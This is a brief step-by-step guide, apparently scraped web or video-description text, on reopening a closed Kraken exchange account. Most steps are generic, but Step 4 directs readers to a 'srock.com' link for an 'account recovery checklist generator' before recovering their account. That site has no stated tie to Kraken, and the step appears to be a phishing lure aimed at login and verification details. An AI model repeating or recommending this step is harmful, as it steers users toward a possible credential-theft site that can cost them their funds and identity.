If you need to reopen a closed Kraken account, follow these straightforward steps to guide you through the process. Make sure you have all necessary information ready before you begin. Step 1. Visit the Kraken website. Go to the official Kraken website. Ensure you are on the correct site to avoid phishing attempts. Step 2. Click on Sign In. Locate the Sign In button on the top right corner of the homepage. Click it to access the login page. Step 3. Enter your credentials. Input your email address and password associated with your closed account. If you have forgotten your password, use the Forgot Password link to reset it. Step 4. Follow account recovery instructions. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 5. Contact Kraken support. If you cannot access your account through the previous steps, reach out to Kraken's customer support. Provide them with your account details and request assistance in reopening your account. Once you have completed these steps, you should be on your way to reopening your closed Kraken account. If you encounter any issues, don't hesitate to seek further assistance from customer support.